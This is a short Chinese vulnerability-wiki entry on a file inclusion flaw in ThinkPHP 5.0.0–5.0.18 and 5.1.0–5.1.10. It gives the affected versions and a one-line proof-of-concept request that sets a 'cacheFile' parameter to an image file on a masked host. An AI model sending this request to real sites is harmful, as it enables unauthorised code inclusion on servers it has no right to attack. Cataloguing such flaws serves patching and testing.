跳转至

Thinkphp5文件包含漏洞

影响范围

5.0.0 <= Thinkphp <= 5.0.18 5.1.0 <= ThinkPHP <= 5.1.10

漏洞POC

http://**********/index/index/index?cacheFile=1.jpg

最后更新: 2021-02-19